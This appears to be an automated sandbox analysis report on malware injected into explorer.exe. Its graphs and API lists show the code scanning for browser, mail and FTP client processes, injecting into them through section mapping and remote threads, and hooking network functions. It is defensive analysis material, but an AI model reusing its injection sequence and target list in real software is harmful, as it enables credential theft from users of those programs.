                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 261 e31860-e31870 call e31ad4 264 e31872-e31880 RtlFreeHeap 261->264 265 e31886-e3188b 261->265 264->265
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                            • Instruction ID: 92f917ca4533791b49ca91bf84afc6238d37f23deafcd8317c1521849b46e917
                                                                                                                            • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                            • Instruction Fuzzy Hash: C1D01224716A080BEF2CBBFA1C8D174BED2E758216F1890A9B819D3251DD39C895C345

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:10.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                            Signature Coverage:17.3%
                                                                                                                            Total number of Nodes:306
                                                                                                                            Total number of Limit Nodes:42
                                                                                                                            execution_graph 708 2f01000 709 2f01010 708->709 710 2f01007 708->710 712 2f01016 710->712 762 2f02608 VirtualQuery 712->762 715 2f01097 715->709 717 2f0102c RtlMoveMemory 718 2f01071 GetCurrentProcessId 717->718 719 2f0104d 717->719 723 2f01092 718->723 724 2f0109e 718->724 799 2f02861 GetProcessHeap RtlAllocateHeap 719->799 721 2f01052 RtlMoveMemory 721->718 723->715 726 2f01095 723->726 765 2f010a4 724->765 800 2f01332 726->800 727 2f010a3 729 2f02861 GetProcessHeap RtlAllocateHeap 727->729 730 2f010cc 729->730 731 2f010dc CreateToolhelp32Snapshot 730->731 732 2f010f0 Process32First 731->732 733 2f01322 Sleep 731->733 734 2f0131b CloseHandle 732->734 735 2f0110c lstrcmpiA 732->735 733->731 734->733 736 2f01124 lstrcmpiA 735->736 748 2f01280 735->748 737 2f01138 lstrcmpiA 736->737 736->748 739 2f0114c lstrcmpiA 737->739 737->748 738 2f025ad OpenProcess IsWow64Process IsWow64Process CloseHandle 738->748 740 2f01160 lstrcmpiA 739->740 739->748 742 2f01170 lstrcmpiA 740->742 740->748 741 2f01305 Process32Next 741->735 743 2f01319 741->743 744 2f01184 lstrcmpiA 742->744 742->748 743->734 745 2f01198 lstrcmpiA 744->745 744->748 746 2f011ac lstrcmpiA 745->746 745->748 747 2f011c0 lstrcmpiA 746->747 746->748 747->748 749 2f011d4 lstrcmpiA 747->749 748->738 748->741 750 2f02608 VirtualQuery 748->750 754 2f012ae lstrcmpiA 748->754 758 2f01819 30 API calls 748->758 749->748 751 2f011e8 lstrcmpiA 749->751 750->748 751->748 752 2f011fc lstrcmpiA 751->752 752->748 753 2f0120c lstrcmpiA 752->753 753->748 755 2f0121c lstrcmpiA 753->755 754->748 755->748 756 2f0122c lstrcmpiA 755->756 756->748 757 2f0123c lstrcmpiA 756->757 757->748 759 2f0124c lstrcmpiA 757->759 758->748 759->748 760 2f0125c lstrcmpiA 759->760 760->748 761 2f0126c lstrcmpiA 760->761 761->741 761->748 763 2f0101e 762->763 763->715 764 2f02861 GetProcessHeap RtlAllocateHeap 763->764 764->717 827 2f02861 GetProcessHeap RtlAllocateHeap 765->827 767 2f010cc 768 2f010dc CreateToolhelp32Snapshot 767->768 769 2f010f0 Process32First 768->769 770 2f01322 Sleep 768->770 771 2f0131b CloseHandle 769->771 772 2f0110c lstrcmpiA 769->772 770->768 771->770 773 2f01280 772->773 774 2f01124 lstrcmpiA 772->774 779 2f01305 Process32Next 773->779 787 2f02608 VirtualQuery 773->787 791 2f012ae lstrcmpiA 773->791 828 2f025ad OpenProcess 773->828 834 2f01819 773->834 774->773 775 2f01138 lstrcmpiA 774->775 775->773 777 2f0114c lstrcmpiA 775->777 777->773 778 2f01160 lstrcmpiA 777->778 778->773 780 2f01170 lstrcmpiA 778->780 779->772 781 2f01319 779->781 780->773 782 2f01184 lstrcmpiA 780->782 781->771 782->773 783 2f01198 lstrcmpiA 782->783 783->773 784 2f011ac lstrcmpiA 783->784 784->773 785 2f011c0 lstrcmpiA 784->785 785->773 786 2f011d4 lstrcmpiA 785->786 786->773 788 2f011e8 lstrcmpiA 786->788 787->773 788->773 789 2f011fc lstrcmpiA 788->789 789->773 790 2f0120c lstrcmpiA 789->790 790->773 792 2f0121c lstrcmpiA 790->792 791->773 792->773 793 2f0122c lstrcmpiA 792->793 793->773 794 2f0123c lstrcmpiA 793->794 794->773 796 2f0124c lstrcmpiA 794->796 796->773 797 2f0125c lstrcmpiA 796->797 797->773 798 2f0126c lstrcmpiA 797->798 798->773 798->779 799->721 880 2f02861 GetProcessHeap RtlAllocateHeap 800->880 802 2f01340 GetModuleFileNameA 881 2f02861 GetProcessHeap RtlAllocateHeap 802->881 804 2f01357 GetCurrentProcessId wsprintfA 882 2f0263e CryptAcquireContextA 804->882 807 2f0139c Sleep 887 2f024d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 807->887 808 2f0140d 905 2f02843 808->905 811 2f013ae GetModuleHandleA GetProcAddress 813 2f013c9 811->813 814 2f013da GetModuleHandleA GetProcAddress 811->814 895 2f01de3 813->895 817 2f013f5 814->817 818 2f01406 814->818 815 2f02843 3 API calls 819 2f0141b RtlExitUserThread 815->819 820 2f01de3 3 API calls 817->820 821 2f024d5 10 API calls 818->821 822 2f01425 819->822 820->818 821->808 823 2f0144b 822->823 824 2f02608 VirtualQuery 822->824 823->724 825 2f0143a 824->825 825->823 910 2f01493 825->910 827->767 829 2f02600 828->829 830 2f025cb IsWow64Process 828->830 829->773 831 2f025ee 830->831 832 2f025dc IsWow64Process 830->832 833 2f025f9 CloseHandle 831->833 832->831 832->833 833->829 835 2f02608 VirtualQuery 834->835 836 2f01833 835->836 837 2f01845 OpenProcess 836->837 838 2f01a76 836->838 837->838 839 2f0185e 837->839 838->773 840 2f02608 VirtualQuery 839->840 841 2f01865 840->841 841->838 842 2f01873 NtSetInformationProcess 841->842 843 2f0188f 841->843 842->843 865 2f01a80 843->865 846 2f01a80 2 API calls 847 2f018d6 846->847 848 2f01a73 CloseHandle 847->848 849 2f01a80 2 API calls 847->849 848->838 850 2f01900 849->850 871 2f01b17 850->871 853 2f01a80 2 API calls 854 2f01930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 853->854 855 2f01a4e CreateRemoteThread 854->855 858 2f01985 854->858 857 2f01a65 CloseHandle 855->857 856 2f0198b CreateMutexA GetLastError 856->858 859 2f019a7 CloseHandle Sleep 856->859 860 2f01a67 CloseHandle CloseHandle 857->860 858->856 861 2f019bb GetModuleHandleA GetProcAddress ReadProcessMemory 858->861 859->856 860->848 862 2f01a47 861->862 863 2f019ec WriteProcessMemory 861->863 862->857 862->860 863->862 864 2f01a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 863->864 864->862 866 2f01a94 865->866 867 2f018b4 865->867 868 2f01aa4 NtCreateSection 866->868 869 2f01ac3 866->869 867->846 868->869 869->867 870 2f01ad8 NtMapViewOfSection 869->870 870->867 872 2f01b2e 871->872 878 2f01b60 871->878 873 2f01b30 RtlMoveMemory 872->873 873->873 873->878 874 2f01bc3 875 2f01910 NtUnmapViewOfSection 874->875 877 2f01be1 LdrProcessRelocationBlock 874->877 875->853 876 2f01b71 LoadLibraryA 876->875 876->878 877->874 877->875 878->874 878->876 879 2f01ba1 GetProcAddress 878->879 879->875 879->878 880->802 881->804 883 2f02664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 882->883 884 2f01384 CreateMutexA GetLastError 882->884 885 2f026aa wsprintfA 883->885 884->807 884->808 885->885 886 2f026cc CryptDestroyHash CryptReleaseContext 885->886 886->884 888 2f02515 887->888 889 2f02565 CloseHandle 888->889 890 2f02555 Thread32Next 888->890 891 2f02521 OpenThread 888->891 889->811 890->888 892 2f02544 ResumeThread 891->892 893 2f0253c SuspendThread 891->893 894 2f0254a CloseHandle 892->894 893->894 894->890 896 2f01ded 895->896 904 2f01e56 895->904 896->904 937 2f01e93 VirtualProtect 896->937 898 2f01e04 898->904 938 2f02815 VirtualAlloc 898->938 900 2f01e10 901 2f01e1a RtlMoveMemory 900->901 902 2f01e2d 900->902 901->902 939 2f01e93 VirtualProtect 902->939 904->814 906 2f02608 VirtualQuery 905->906 907 2f0284b 906->907 908 2f01414 907->908 909 2f0284f GetProcessHeap HeapFree 907->909 908->815 909->908 911 2f014c0 910->911 912 2f014a1 910->912 914 2f01510 911->914 915 2f014c8 911->915 940 2f017c7 912->940 959 2f026e6 lstrlen lstrlen 914->959 918 2f017c7 5 API calls 915->918 933 2f014b6 915->933 920 2f014e0 918->920 919 2f0155f 921 2f026e6 2 API calls 919->921 920->933 947 2f01647 920->947 923 2f0156c 921->923 926 2f015a0 923->926 927 2f01584 923->927 923->933 924 2f01532 961 2f01752 GetModuleHandleA GetProcAddress 924->961 931 2f02404 5 API calls 926->931 926->933 964 2f02404 lstrlen 927->964 934 2f015ac 931->934 932 2f01647 11 API calls 932->933 933->823 934->933 935 2f01647 11 API calls 934->935 936 2f014fb 935->936 936->933 970 2f015e0 936->970 937->898 938->900 939->904 941 2f01812 940->941 942 2f017d1 940->942 941->933 942->941 943 2f026e6 2 API calls 942->943 944 2f017f1 943->944 944->941 975 2f02861 GetProcessHeap RtlAllocateHeap 944->975 946 2f01804 RtlMoveMemory 946->941 948 2f01660 947->948 949 2f01745 947->949 948->949 950 2f01671 lstrlen 948->950 949->936 950->949 951 2f01683 lstrlen 950->951 951->949 952 2f01690 getpeername 951->952 952->949 953 2f016ae inet_ntoa htons 952->953 953->949 954 2f016cc 953->954 954->949 976 2f02861 GetProcessHeap RtlAllocateHeap 954->976 956 2f01717 wsprintfA 957 2f0173a 956->957 957->949 958 2f02843 3 API calls 957->958 958->949 960 2f0151d 959->960 960->919 960->924 962 2f01539 961->962 963 2f01776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 961->963 962->932 962->933 963->962 965 2f02456 964->965 966 2f0241c CryptStringToBinaryA 964->966 965->933 966->965 967 2f02438 966->967 977 2f02861 GetProcessHeap RtlAllocateHeap 967->977 969 2f02444 CryptStringToBinaryA 969->965 971 2f02843 3 API calls 970->971 972 2f015f5 971->972 973 2f02843 3 API calls 972->973 974 2f015fc 973->974 974->933 975->946 976->956 977->969 987 2f01425 988 2f01432 987->988 989 2f0144b 987->989 990 2f02608 VirtualQuery 988->990 991 2f0143a 990->991 991->989 992 2f01493 23 API calls 991->992 992->989 993 2f01eb6 994 2f01ed9 993->994 995 2f01ecc lstrlen 993->995 1004 2f02861 GetProcessHeap RtlAllocateHeap 994->1004 995->994 997 2f01ee1 lstrcat 998 2f01f16 lstrcat 997->998 999 2f01f1d 997->999 998->999 1005 2f01f4a 999->1005 1002 2f02843 3 API calls 1003 2f01f40 1002->1003 1004->997 1039 2f022b8 1005->1039 1009 2f01f77 1044 2f027e2 lstrlen MultiByteToWideChar 1009->1044 1011 2f01f86 1045 2f02374 RtlZeroMemory 1011->1045 1014 2f01fd8 RtlZeroMemory 1016 2f0200d 1014->1016 1015 2f02843 3 API calls 1017 2f01f2d 1015->1017 1018 2f0229a 1016->1018 1022 2f0203b 1016->1022 1047 2f022e5 1016->1047 1017->1002 1018->1015 1020 2f02280 1020->1018 1021 2f02843 3 API calls 1020->1021 1021->1018 1022->1020 1056 2f02861 GetProcessHeap RtlAllocateHeap 1022->1056 1024 2f0210b wsprintfW 1025 2f02131 1024->1025 1029 2f0219e 1025->1029 1057 2f02861 GetProcessHeap RtlAllocateHeap 1025->1057 1027 2f0216b wsprintfW 1027->1029 1028 2f0225d 1030 2f02843 3 API calls 1028->1030 1029->1028 1058 2f02861 GetProcessHeap RtlAllocateHeap 1029->1058 1032 2f02271 1030->1032 1032->1020 1033 2f02843 3 API calls 1032->1033 1033->1020 1034 2f02256 1037 2f02843 3 API calls 1034->1037 1035 2f021e9 1035->1034 1059 2f02815 VirtualAlloc 1035->1059 1037->1028 1038 2f02243 RtlMoveMemory 1038->1034 1040 2f01f69 1039->1040 1041 2f022c2 1039->1041 1043 2f02861 GetProcessHeap RtlAllocateHeap 1040->1043 1042 2f026e6 2 API calls 1041->1042 1042->1040 1043->1009 1044->1011 1046 2f01f96 1045->1046 1046->1014 1046->1018 1048 2f02353 1047->1048 1050 2f022f2 1047->1050 1048->1022 1049 2f022f6 DnsQuery_W 1049->1050 1050->1048 1050->1049 1051 2f02335 DnsFree inet_ntoa 1050->1051 1051->1050 1052 2f02355 1051->1052 1060 2f02861 GetProcessHeap RtlAllocateHeap 1052->1060 1054 2f0235f 1061 2f027e2 lstrlen MultiByteToWideChar 1054->1061 1056->1024 1057->1027 1058->1035 1059->1038 1060->1054 1061->1048 1062 2f02806 VirtualFree 978 2f07728 979 2f07904 978->979 980 2f0774b 978->980 979->979 981 2f0785a LoadLibraryA 980->981 985 2f0789f VirtualProtect VirtualProtect 980->985 982 2f07871 981->982 982->980 984 2f07883 GetProcAddress 982->984 984->982 986 2f07899 984->986 985->979 1069 2f0245e lstrlen 1070 2f024a5 1069->1070 1071 2f02476 CryptBinaryToStringA 1069->1071 1071->1070 1072 2f02489 1071->1072 1075 2f02861 GetProcessHeap RtlAllocateHeap 1072->1075 1074 2f02494 CryptBinaryToStringA 1074->1070 1075->1074

                                                                                                                            Callgraph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            • Opacity -> Relevance
                                                                                                                            • Disassembly available
                                                                                                                            callgraph 0 Function_02F02731 1 Function_02F01332 6 Function_02F0263E 1->6 9 Function_02F02861 1->9 11 Function_02F01DE3 1->11 22 Function_02F01493 1->22 24 Function_02F024D5 1->24 37 Function_02F02843 1->37 42 Function_02F02608 1->42 2 Function_02F02573 3 Function_02F02374 4 Function_02F01EB6 4->9 4->37 43 Function_02F01F4A 4->43 5 Function_02F022B8 15 Function_02F026E6 5->15 7 Function_02F0283F 8 Function_02F015E0 8->37 10 Function_02F027E2 23 Function_02F01E93 11->23 25 Function_02F02815 11->25 31 Function_02F01E5D 11->31 34 Function_02F01DC0 11->34 12 Function_02F010A4 12->0 12->2 12->9 18 Function_02F025AD 12->18 20 Function_02F02592 12->20 29 Function_02F01819 12->29 12->42 13 Function_02F01425 13->22 13->42 14 Function_02F022E5 14->9 14->10 16 Function_02F07728 17 Function_02F01469 17->22 17->42 19 Function_02F024AE 21 Function_02F01752 22->8 22->15 22->21 38 Function_02F02404 22->38 40 Function_02F01647 22->40 41 Function_02F017C7 22->41 26 Function_02F01016 26->0 26->1 26->2 26->9 26->12 26->18 26->20 26->29 26->42 27 Function_02F01B17 28 Function_02F03417 29->27 33 Function_02F01A80 29->33 29->42 30 Function_02F01C19 35 Function_02F01D80 31->35 32 Function_02F0245E 32->9 34->30 35->30 36 Function_02F01000 36->26 37->42 38->9 39 Function_02F02806 40->9 40->19 40->37 41->9 41->15 43->0 43->3 43->5 43->9 43->10 43->14 43->25 43->37

                                                                                                                            Executed Functions

                                                                                                                            Function 02F01016 Relevance: 89.5, APIs: 30, Strings: 21, Instructions: 244stringsleepprocessCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 2f01016-2f01020 call 2f02608 3 2f01022-2f0104b call 2f02861 RtlMoveMemory 0->3 4 2f01097-2f01098 0->4 7 2f01071-2f01090 GetCurrentProcessId 3->7 8 2f0104d-2f0106b call 2f02861 RtlMoveMemory 3->8 12 2f01092-2f01093 7->12 13 2f0109e-2f010d7 call 2f010a4 call 2f02861 7->13 8->7 12->4 15 2f01095-2f01099 call 2f01332 12->15 22 2f010dc-2f010ea CreateToolhelp32Snapshot 13->22 15->13 23 2f010f0-2f01106 Process32First 22->23 24 2f01322-2f0132d Sleep 22->24 25 2f0131b-2f0131c CloseHandle 23->25 26 2f0110c-2f0111e lstrcmpiA 23->26 24->22 25->24 27 2f01280-2f01289 call 2f025ad 26->27 28 2f01124-2f01132 lstrcmpiA 26->28 34 2f01305-2f01313 Process32Next 27->34 35 2f0128b-2f01294 call 2f02592 27->35 28->27 29 2f01138-2f01146 lstrcmpiA 28->29 29->27 31 2f0114c-2f0115a lstrcmpiA 29->31 31->27 33 2f01160-2f0116a lstrcmpiA 31->33 33->27 36 2f01170-2f0117e lstrcmpiA 33->36 34->26 37 2f01319 34->37 35->34 42 2f01296-2f0129d call 2f02573 35->42 36->27 39 2f01184-2f01192 lstrcmpiA 36->39 37->25 39->27 41 2f01198-2f011a6 lstrcmpiA 39->41 41->27 43 2f011ac-2f011ba lstrcmpiA 41->43 42->34 47 2f0129f-2f012ac call 2f02608 42->47 43->27 45 2f011c0-2f011ce lstrcmpiA 43->45 45->27 48 2f011d4-2f011e2 lstrcmpiA 45->48 47->34 54 2f012ae-2f01300 lstrcmpiA call 2f02731 call 2f01819 call 2f02731 47->54 48->27 50 2f011e8-2f011f6 lstrcmpiA 48->50 50->27 52 2f011fc-2f0120a lstrcmpiA 50->52 52->27 53 2f0120c-2f0121a lstrcmpiA 52->53 53->27 55 2f0121c-2f0122a lstrcmpiA 53->55 54->34 55->27 57 2f0122c-2f0123a lstrcmpiA 55->57 57->27 59 2f0123c-2f0124a lstrcmpiA 57->59 59->27 61 2f0124c-2f0125a lstrcmpiA 59->61 61->27 63 2f0125c-2f0126a lstrcmpiA 61->63 63->27 65 2f0126c-2f0127a lstrcmpiA 63->65 65->27 65->34
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02F02608: VirtualQuery.KERNEL32(02F04434,?,0000001C), ref: 02F02615
                                                                                                                              • Part of subcall function 02F02861: GetProcessHeap.KERNEL32(00000008,0000A000,02F010CC), ref: 02F02864
                                                                                                                              • Part of subcall function 02F02861: RtlAllocateHeap.NTDLL(00000000), ref: 02F0286B
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02F01038
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02F0106B
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02F01074
                                                                                                                            • GetCurrentProcessId.KERNEL32(?,02F01010), ref: 02F0107A
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F010DF
                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 02F010FE
                                                                                                                            • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02F0111A
                                                                                                                            • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02F0112E
                                                                                                                            • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02F01142
                                                                                                                            • lstrcmpiA.KERNEL32(?,opera.exe), ref: 02F01156
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F01166
                                                                                                                            • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 02F0117A
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 02F0118E
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 02F011A2
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 02F011B6
                                                                                                                            • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 02F011CA
                                                                                                                            • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 02F011DE
                                                                                                                            • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 02F011F2
                                                                                                                            • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02F01206
                                                                                                                            • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02F01216
                                                                                                                            • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02F01226
                                                                                                                            • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02F01236
                                                                                                                            • lstrcmpiA.KERNEL32(?,263em.exe), ref: 02F01246
                                                                                                                            • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02F01256
                                                                                                                            • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02F01266
                                                                                                                            • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02F01276
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F012B4
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 02F0130B
                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 02F0131C
                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 02F01327
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                            • String ID: 0-8wP,8w$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                            • API String ID: 2555639992-1022288460
                                                                                                                            • Opcode ID: f95afa416cc2f1d5b89333d47d40b7401d0b70ba04958a47227f498277f66d95
                                                                                                                            • Instruction ID: 49d546cd9ab95504193127289be062a997a6ff9f65ed47780dfeda650809bfc5
                                                                                                                            • Opcode Fuzzy Hash: f95afa416cc2f1d5b89333d47d40b7401d0b70ba04958a47227f498277f66d95
                                                                                                                            • Instruction Fuzzy Hash: B2719230E41309ABEB10DBB19DC8E6BBBACBB497C4B040969FF45D20C4DB60D509AF64
                                                                                                                            Function 02F010A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203stringsleepprocessCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02F02861: GetProcessHeap.KERNEL32(00000008,0000A000,02F010CC), ref: 02F02864
                                                                                                                              • Part of subcall function 02F02861: RtlAllocateHeap.NTDLL(00000000), ref: 02F0286B
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F010DF
                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 02F010FE
                                                                                                                            • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02F0111A
                                                                                                                            • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02F0112E
                                                                                                                            • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02F01142
                                                                                                                            • lstrcmpiA.KERNEL32(?,opera.exe), ref: 02F01156
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F01166
                                                                                                                            • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 02F0117A
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 02F0118E
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 02F011A2
                                                                                                                            • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 02F011B6
                                                                                                                            • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 02F011CA
                                                                                                                            • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 02F011DE
                                                                                                                            • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 02F011F2
                                                                                                                            • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02F01206
                                                                                                                            • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02F01216
                                                                                                                            • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02F01226
                                                                                                                            • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02F01236
                                                                                                                            • lstrcmpiA.KERNEL32(?,263em.exe), ref: 02F01246
                                                                                                                            • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02F01256
                                                                                                                            • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02F01266
                                                                                                                            • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02F01276
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F012B4
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 02F0130B
                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 02F0131C
                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 02F01327
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                                            • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                            • API String ID: 3950187957-1680033604
                                                                                                                            • Opcode ID: 8b1bd82951850362ebd7952a4ce6b2470bff6528153a2babdc2fb09c3216ee6c
                                                                                                                            • Instruction ID: 22ac626dab0b549fbd685e48ad94cb1394e1141af468d2b82091c8fe7708aee2
                                                                                                                            • Opcode Fuzzy Hash: 8b1bd82951850362ebd7952a4ce6b2470bff6528153a2babdc2fb09c3216ee6c
                                                                                                                            • Instruction Fuzzy Hash: 41517230E05309A6EB10DBB18DC4E6F7BEC6E89BC4B040929FB45C20C4EB64E509AF75
                                                                                                                            Function 02F07728 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 113 2f07728-2f07745 114 2f0774b-2f07758 113->114 115 2f0790d 113->115 116 2f0776a-2f0776f 114->116 115->115 117 2f07771 116->117 118 2f07760-2f07765 117->118 119 2f07773 117->119 120 2f07766-2f07768 118->120 121 2f07778-2f0777a 119->121 120->116 120->117 122 2f07783-2f07787 121->122 123 2f0777c-2f07781 121->123 122->121 124 2f07789 122->124 123->122 125 2f07794-2f07799 124->125 126 2f0778b-2f07792 124->126 127 2f077a8-2f077aa 125->127 128 2f0779b-2f077a4 125->128 126->121 126->125 131 2f077b3-2f077b7 127->131 132 2f077ac-2f077b1 127->132 129 2f077a6 128->129 130 2f0781a-2f0781d 128->130 129->127 135 2f07822-2f07825 130->135 133 2f077c0-2f077c2 131->133 134 2f077b9-2f077be 131->134 132->131 137 2f077e4-2f077f3 133->137 138 2f077c4 133->138 134->133 136 2f07827-2f07829 135->136 136->135 139 2f0782b-2f0782e 136->139 141 2f07804-2f07811 137->141 142 2f077f5-2f077fc 137->142 140 2f077c5-2f077c7 138->140 139->135 143 2f07830-2f0784c 139->143 144 2f077d0-2f077d4 140->144 145 2f077c9-2f077ce 140->145 141->141 147 2f07813-2f07815 141->147 142->142 146 2f077fe 142->146 143->136 148 2f0784e 143->148 144->140 149 2f077d6 144->149 145->144 146->120 147->120 150 2f07854-2f07858 148->150 151 2f077e1 149->151 152 2f077d8-2f077df 149->152 153 2f0785a-2f07870 LoadLibraryA 150->153 154 2f0789f-2f078a2 150->154 151->137 152->140 152->151 155 2f07871-2f07876 153->155 156 2f078a5-2f078ac 154->156 155->150 157 2f07878-2f0787a 155->157 158 2f078d0-2f07900 VirtualProtect * 2 156->158 159 2f078ae-2f078b0 156->159 161 2f07883-2f07890 GetProcAddress 157->161 162 2f0787c-2f07882 157->162 160 2f07904-2f07908 158->160 163 2f078b2-2f078c1 159->163 164 2f078c3-2f078ce 159->164 160->160 165 2f0790a 160->165 166 2f07892-2f07897 161->166 167 2f07899-2f0789c 161->167 162->161 163->156 164->163 165->115 166->155
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F06000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F06000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f06000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d61328d9644783f32f0c46b7311b119f47afcf68d8a47ee6a31c313ac0ba99db
                                                                                                                            • Instruction ID: 2d69debd8a934100947f8606f16d2cdb9231ffbbf311ebf5798e852e7e4efc39
                                                                                                                            • Opcode Fuzzy Hash: d61328d9644783f32f0c46b7311b119f47afcf68d8a47ee6a31c313ac0ba99db
                                                                                                                            • Instruction Fuzzy Hash: E1511B71E443954FD7216A78CCC0B71FBA0DB422A0B2906F9C6E5C73C6E7547806D7A4
                                                                                                                            Function 02F02861 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
